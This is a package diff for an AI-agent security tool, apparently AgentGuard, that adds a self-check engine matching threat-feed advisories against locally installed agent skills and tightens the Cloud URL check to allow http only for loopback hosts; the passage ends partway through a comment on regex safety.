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"}
|
package/dist/config.d.ts.map
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"config.d.ts","sourceRoot":"","sources":["../src/config.ts"],"names":[],"mappings":"AAIA,MAAM,WAAW,gBAAgB;IAC/B,OAAO,EAAE,CAAC,CAAC;IACX,KAAK,EAAE,QAAQ,GAAG,UAAU,GAAG,YAAY,CAAC;IAC5C,QAAQ,CAAC,EAAE,MAAM,CAAC;IAClB,MAAM,CAAC,EAAE,MAAM,CAAC;IAChB,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,eAAe,EAAE,MAAM,CAAC;IACxB,SAAS,EAAE,MAAM,CAAC;IAClB,cAAc,EAAE,MAAM,CAAC;CACxB;AAED,MAAM,WAAW,eAAe;IAC9B,IAAI,EAAE,MAAM,CAAC;IACb,UAAU,EAAE,MAAM,CAAC;IACnB,eAAe,EAAE,MAAM,CAAC;IACxB,SAAS,EAAE,MAAM,CAAC;IAClB,cAAc,EAAE,MAAM,CAAC;CACxB;AAKD,wBAAgB,kBAAkB,IAAI,eAAe,CASpD;AAED,wBAAgB,aAAa,IAAI,gBAAgB,CAUhD;AAED,wBAAgB,oBAAoB,IAAI,eAAe,CAKtD;AAED,wBAAgB,YAAY,IAAI,gBAAgB,CAQ/C;AAED,wBAAgB,UAAU,IAAI,gBAAgB,CAkB7C;AAED,wBAAgB,UAAU,CAAC,MAAM,EAAE,gBAAgB,GAAG,IAAI,CAKzD;AAED,wBAAgB,YAAY,CAAC,OAAO,EAAE;IAAE,MAAM,EAAE,MAAM,CAAC;IAAC,QAAQ,CAAC,EAAE,MAAM,CAAA;CAAE,GAAG,gBAAgB,CAW7F;AAED,wBAAgB,UAAU,CAAC,MAAM,CAAC,EAAE,MAAM,GAAG,MAAM,CAIlD;AAED,wBAAgB,cAAc,CAAC,MAAM,EAAE,MAAM,GAAG,IAAI,CAInD;
|
|
1
|
+
{"version":3,"file":"config.d.ts","sourceRoot":"","sources":["../src/config.ts"],"names":[],"mappings":"AAIA,MAAM,WAAW,gBAAgB;IAC/B,OAAO,EAAE,CAAC,CAAC;IACX,KAAK,EAAE,QAAQ,GAAG,UAAU,GAAG,YAAY,CAAC;IAC5C,QAAQ,CAAC,EAAE,MAAM,CAAC;IAClB,MAAM,CAAC,EAAE,MAAM,CAAC;IAChB,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,eAAe,EAAE,MAAM,CAAC;IACxB,SAAS,EAAE,MAAM,CAAC;IAClB,cAAc,EAAE,MAAM,CAAC;CACxB;AAED,MAAM,WAAW,eAAe;IAC9B,IAAI,EAAE,MAAM,CAAC;IACb,UAAU,EAAE,MAAM,CAAC;IACnB,eAAe,EAAE,MAAM,CAAC;IACxB,SAAS,EAAE,MAAM,CAAC;IAClB,cAAc,EAAE,MAAM,CAAC;CACxB;AAKD,wBAAgB,kBAAkB,IAAI,eAAe,CASpD;AAED,wBAAgB,aAAa,IAAI,gBAAgB,CAUhD;AAED,wBAAgB,oBAAoB,IAAI,eAAe,CAKtD;AAED,wBAAgB,YAAY,IAAI,gBAAgB,CAQ/C;AAED,wBAAgB,UAAU,IAAI,gBAAgB,CAkB7C;AAED,wBAAgB,UAAU,CAAC,MAAM,EAAE,gBAAgB,GAAG,IAAI,CAKzD;AAED,wBAAgB,YAAY,CAAC,OAAO,EAAE;IAAE,MAAM,EAAE,MAAM,CAAC;IAAC,QAAQ,CAAC,EAAE,MAAM,CAAA;CAAE,GAAG,gBAAgB,CAW7F;AAED,wBAAgB,UAAU,CAAC,MAAM,CAAC,EAAE,MAAM,GAAG,MAAM,CAIlD;AAED,wBAAgB,cAAc,CAAC,MAAM,EAAE,MAAM,GAAG,IAAI,CAInD;AAID,wBAAgB,iBAAiB,CAAC,KAAK,EAAE,MAAM,GAAG,MAAM,CAevD"}
|
package/dist/config.js
CHANGED
|
@@ -101,6 +101,7 @@ function validateApiKey(apiKey) {
|
|
|
101
101
|
throw new Error('Invalid AgentGuard API key format. Expected an ag_live_ key.');
|
|
102
102
|
}
|
|
103
103
|
}
|
|
104
|
+
const LOOPBACK_HOSTS = new Set(['localhost', '127.0.0.1', '::1', '0.0.0.0']);
|
|
104
105
|
function normalizeCloudUrl(value) {
|
|
105
106
|
const normalized = value.replace(/\/+$/, '');
|
|
106
107
|
let parsed;
|
|
@@ -110,8 +111,9 @@ function normalizeCloudUrl(value) {
|
|
|
110
111
|
catch {
|
|
111
112
|
throw new Error('Invalid Cloud URL.');
|
|
112
113
|
}
|
|
113
|
-
|
|
114
|
-
|
|
114
|
+
const isLoopback = LOOPBACK_HOSTS.has(parsed.hostname);
|
|
115
|
+
if (parsed.protocol !== 'https:' && !(parsed.protocol === 'http:' && isLoopback)) {
|
|
116
|
+
throw new Error('Invalid Cloud URL. AgentGuard Cloud URLs must use https:// (http:// allowed only for loopback hosts).');
|
|
115
117
|
}
|
|
116
118
|
return normalized;
|
|
117
119
|
}
|
package/dist/config.js.map
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"config.js","sourceRoot":"","sources":["../src/config.ts"],"names":[],"mappings":";;AA0BA,gDASC;AAED,sCAUC;AAED,oDAKC;AAED,oCAQC;AAED,gCAkBC;AAED,gCAKC;AAED,oCAWC;AAED,gCAIC;AAED,wCAIC;
|
|
1
|
+
{"version":3,"file":"config.js","sourceRoot":"","sources":["../src/config.ts"],"names":[],"mappings":"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"}
|
|
@@ -0,0 +1,36 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Self-check engine — runs a single threat-feed advisory against the locally
|
|
3
|
+
* installed skills / plugins / MCP servers and reports which artifacts match.
|
|
4
|
+
*
|
|
5
|
+
* Designed to be cheap (read-only filesystem ops, hashing only when an
|
|
6
|
+
* advisory actually asks for a hash) and never crash on a single bad artifact.
|
|
7
|
+
*/
|
|
8
|
+
import type { Advisory, SelfCheckResult } from './types.js';
|
|
9
|
+
/**
|
|
10
|
+
* Default search locations for each ecosystem.
|
|
11
|
+
*
|
|
12
|
+
* Skill locations cover the four agent frameworks that use the agentskills.io
|
|
13
|
+
* SKILL.md standard: Claude Code, OpenClaw, Hermes Agent, Cursor (project
|
|
14
|
+
* scope only — caller can supply extra roots). MCP server locations cover
|
|
15
|
+
* Claude Code's `~/.claude.json` and Codex's `~/.codex/config.toml` install
|
|
16
|
+
* conventions, but inspection of those is config-aware and lives elsewhere.
|
|
17
|
+
*/
|
|
18
|
+
export declare const DEFAULT_SKILL_ROOTS: string[];
|
|
19
|
+
export interface RunSelfCheckOptions {
|
|
20
|
+
/** Override the default per-ecosystem search roots. */
|
|
21
|
+
skillRoots?: string[];
|
|
22
|
+
/** Cap on hashing work: skill dirs beyond this count are skipped. */
|
|
23
|
+
maxArtifacts?: number;
|
|
24
|
+
}
|
|
25
|
+
/**
|
|
26
|
+
* Run one advisory against the local environment. Never throws — failures
|
|
27
|
+
* become warnings on the result so the caller can keep iterating advisories.
|
|
28
|
+
*/
|
|
29
|
+
export declare function runSelfCheckForAdvisory(advisory: Advisory, options?: RunSelfCheckOptions): Promise<SelfCheckResult>;
|
|
30
|
+
export declare function safeRegexTest(pattern: string, body: string): boolean;
|
|
31
|
+
/**
|
|
32
|
+
* Simple glob match supporting `*` as a single-segment wildcard. Sufficient
|
|
33
|
+
* for `slack-webhook-*` style advisories without pulling in a glob lib.
|
|
34
|
+
*/
|
|
35
|
+
export declare function globMatch(pattern: string, value: string): boolean;
|
|
36
|
+
//# sourceMappingURL=selfcheck.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"selfcheck.d.ts","sourceRoot":"","sources":["../../src/feed/selfcheck.ts"],"names":[],"mappings":"AAAA;;;;;;GAMG;AAOH,OAAO,KAAK,EACV,QAAQ,EAGR,eAAe,EAChB,MAAM,YAAY,CAAC;AAEpB;;;;;;;;GAQG;AACH,eAAO,MAAM,mBAAmB,UAK/B,CAAC;AAEF,MAAM,WAAW,mBAAmB;IAClC,uDAAuD;IACvD,UAAU,CAAC,EAAE,MAAM,EAAE,CAAC;IACtB,qEAAqE;IACrE,YAAY,CAAC,EAAE,MAAM,CAAC;CACvB;AAED;;;GAGG;AACH,wBAAsB,uBAAuB,CAC3C,QAAQ,EAAE,QAAQ,EAClB,OAAO,GAAE,mBAAwB,GAChC,OAAO,CAAC,eAAe,CAAC,CAqC1B;AAgGD,wBAAgB,aAAa,CAAC,OAAO,EAAE,MAAM,EAAE,IAAI,EAAE,MAAM,GAAG,OAAO,CAiBpE;AAED;;;GAGG;AACH,wBAAgB,SAAS,CAAC,OAAO,EAAE,MAAM,EAAE,KAAK,EAAE,MAAM,GAAG,OAAO,CAOjE"}
|
|
@@ -0,0 +1,198 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
/**
|
|
3
|
+
* Self-check engine — runs a single threat-feed advisory against the locally
|
|
4
|
+
* installed skills / plugins / MCP servers and reports which artifacts match.
|
|
5
|
+
*
|
|
6
|
+
* Designed to be cheap (read-only filesystem ops, hashing only when an
|
|
7
|
+
* advisory actually asks for a hash) and never crash on a single bad artifact.
|
|
8
|
+
*/
|
|
9
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
10
|
+
exports.DEFAULT_SKILL_ROOTS = void 0;
|
|
11
|
+
exports.runSelfCheckForAdvisory = runSelfCheckForAdvisory;
|
|
12
|
+
exports.safeRegexTest = safeRegexTest;
|
|
13
|
+
exports.globMatch = globMatch;
|
|
14
|
+
const node_fs_1 = require("node:fs");
|
|
15
|
+
const promises_1 = require("node:fs/promises");
|
|
16
|
+
const node_os_1 = require("node:os");
|
|
17
|
+
const node_path_1 = require("node:path");
|
|
18
|
+
const hash_js_1 = require("../utils/hash.js");
|
|
19
|
+
/**
|
|
20
|
+
* Default search locations for each ecosystem.
|
|
21
|
+
*
|
|
22
|
+
* Skill locations cover the four agent frameworks that use the agentskills.io
|
|
23
|
+
* SKILL.md standard: Claude Code, OpenClaw, Hermes Agent, Cursor (project
|
|
24
|
+
* scope only — caller can supply extra roots). MCP server locations cover
|
|
25
|
+
* Claude Code's `~/.claude.json` and Codex's `~/.codex/config.toml` install
|
|
26
|
+
* conventions, but inspection of those is config-aware and lives elsewhere.
|
|
27
|
+
*/
|
|
28
|
+
exports.DEFAULT_SKILL_ROOTS = [
|
|
29
|
+
(0, node_path_1.join)((0, node_os_1.homedir)(), '.claude', 'skills'),
|
|
30
|
+
(0, node_path_1.join)((0, node_os_1.homedir)(), '.openclaw', 'skills'),
|
|
31
|
+
(0, node_path_1.join)((0, node_os_1.homedir)(), '.openclaw', 'workspace', 'skills'),
|
|
32
|
+
(0, node_path_1.join)((0, node_os_1.homedir)(), '.hermes', 'skills'),
|
|
33
|
+
];
|
|
34
|
+
/**
|
|
35
|
+
* Run one advisory against the local environment. Never throws — failures
|
|
36
|
+
* become warnings on the result so the caller can keep iterating advisories.
|
|
37
|
+
*/
|
|
38
|
+
async function runSelfCheckForAdvisory(advisory, options = {}) {
|
|
39
|
+
const startedAt = Date.now();
|
|
40
|
+
const matches = [];
|
|
41
|
+
const warnings = [];
|
|
42
|
+
if (advisory.withdrawnAt) {
|
|
43
|
+
return { advisoryId: advisory.id, matchedArtifacts: [], elapsedMs: 0, warnings };
|
|
44
|
+
}
|
|
45
|
+
if (advisory.ecosystem !== 'skill') {
|
|
46
|
+
warnings.push(`ecosystem "${advisory.ecosystem}" not implemented; only "skill" is supported in this build`);
|
|
47
|
+
return { advisoryId: advisory.id, matchedArtifacts: [], elapsedMs: Date.now() - startedAt, warnings };
|
|
48
|
+
}
|
|
49
|
+
const roots = options.skillRoots ?? exports.DEFAULT_SKILL_ROOTS;
|
|
50
|
+
const skillDirs = await listSkillDirs(roots);
|
|
51
|
+
const cap = options.maxArtifacts ?? 500;
|
|
52
|
+
const considered = skillDirs.slice(0, cap);
|
|
53
|
+
if (skillDirs.length > cap) {
|
|
54
|
+
warnings.push(`only checked first ${cap} of ${skillDirs.length} skill directories`);
|
|
55
|
+
}
|
|
56
|
+
for (const dir of considered) {
|
|
57
|
+
try {
|
|
58
|
+
const m = await matchSkillDir(dir, advisory.affected);
|
|
59
|
+
if (m)
|
|
60
|
+
matches.push(m);
|
|
61
|
+
}
|
|
62
|
+
catch (err) {
|
|
63
|
+
warnings.push(`skipped ${dir}: ${err.message}`);
|
|
64
|
+
}
|
|
65
|
+
}
|
|
66
|
+
return {
|
|
67
|
+
advisoryId: advisory.id,
|
|
68
|
+
matchedArtifacts: matches,
|
|
69
|
+
elapsedMs: Date.now() - startedAt,
|
|
70
|
+
warnings,
|
|
71
|
+
};
|
|
72
|
+
}
|
|
73
|
+
/** Enumerate every immediate subdirectory of `roots` that contains a SKILL.md. */
|
|
74
|
+
async function listSkillDirs(roots) {
|
|
75
|
+
const found = [];
|
|
76
|
+
for (const root of roots) {
|
|
77
|
+
if (!(0, node_fs_1.existsSync)(root))
|
|
78
|
+
continue;
|
|
79
|
+
let entries;
|
|
80
|
+
try {
|
|
81
|
+
entries = await (0, promises_1.readdir)(root, { withFileTypes: true });
|
|
82
|
+
}
|
|
83
|
+
catch {
|
|
84
|
+
continue;
|
|
85
|
+
}
|
|
86
|
+
for (const entry of entries) {
|
|
87
|
+
if (!entry.isDirectory())
|
|
88
|
+
continue;
|
|
89
|
+
const skillPath = (0, node_path_1.join)(root, entry.name);
|
|
90
|
+
const manifest = (0, node_path_1.join)(skillPath, 'SKILL.md');
|
|
91
|
+
if ((0, node_fs_1.existsSync)(manifest))
|
|
92
|
+
found.push(skillPath);
|
|
93
|
+
}
|
|
94
|
+
}
|
|
95
|
+
return found;
|
|
96
|
+
}
|
|
97
|
+
/**
|
|
98
|
+
* Match one skill directory against an advisory's affected[] matchers.
|
|
99
|
+
* Returns the first match found (per matcher precedence: hash > regex > name).
|
|
100
|
+
* Returns null when nothing matched.
|
|
101
|
+
*/
|
|
102
|
+
async function matchSkillDir(skillDir, affected) {
|
|
103
|
+
const name = (0, node_path_1.basename)(skillDir);
|
|
104
|
+
const manifestPath = (0, node_path_1.join)(skillDir, 'SKILL.md');
|
|
105
|
+
// Canonical hash input: the SKILL.md content. The cloud publishes
|
|
106
|
+
// SKILL.md hashes (not directory rollups), so this is the field that
|
|
107
|
+
// must match server-side for `sha256` matchers to be meaningful.
|
|
108
|
+
let localHash = null;
|
|
109
|
+
const wantsHash = affected.some((m) => m.sha256);
|
|
110
|
+
if (wantsHash && (0, node_fs_1.existsSync)(manifestPath)) {
|
|
111
|
+
try {
|
|
112
|
+
localHash = await (0, hash_js_1.hashFile)(manifestPath);
|
|
113
|
+
}
|
|
114
|
+
catch {
|
|
115
|
+
localHash = null;
|
|
116
|
+
}
|
|
117
|
+
}
|
|
118
|
+
// Regex matching needs the manifest body — only read if some matcher asks.
|
|
119
|
+
let body = null;
|
|
120
|
+
const wantsBody = affected.some((m) => m.bodyRegex);
|
|
121
|
+
if (wantsBody) {
|
|
122
|
+
try {
|
|
123
|
+
body = await (0, promises_1.readFile)(manifestPath, 'utf8');
|
|
124
|
+
// Cap body length to keep regex evaluation bounded.
|
|
125
|
+
if (body.length > MAX_BODY_BYTES)
|
|
126
|
+
body = body.slice(0, MAX_BODY_BYTES);
|
|
127
|
+
}
|
|
128
|
+
catch {
|
|
129
|
+
body = '';
|
|
130
|
+
}
|
|
131
|
+
}
|
|
132
|
+
for (const matcher of affected) {
|
|
133
|
+
if (matcher.sha256 && localHash && matcher.sha256.toLowerCase() === localHash.toLowerCase()) {
|
|
134
|
+
return { path: skillDir, matchedBy: 'sha256', hash: localHash };
|
|
135
|
+
}
|
|
136
|
+
if (matcher.bodyRegex && body !== null) {
|
|
137
|
+
if (safeRegexTest(matcher.bodyRegex, body)) {
|
|
138
|
+
return { path: skillDir, matchedBy: 'bodyRegex' };
|
|
139
|
+
}
|
|
140
|
+
}
|
|
141
|
+
if (matcher.namePattern && globMatch(matcher.namePattern, name)) {
|
|
142
|
+
return { path: skillDir, matchedBy: 'namePattern' };
|
|
143
|
+
}
|
|
144
|
+
}
|
|
145
|
+
return null;
|
|
146
|
+
}
|
|
147
|
+
/**
|
|
148
|
+
* Defense against catastrophic backtracking and malformed regex coming
|
|
149
|
+
* from upstream advisory data:
|
|
150
|
+
* - cap the pattern length
|
|
151
|
+
* - reject patterns with obvious nested-quantifier shapes that explode
|
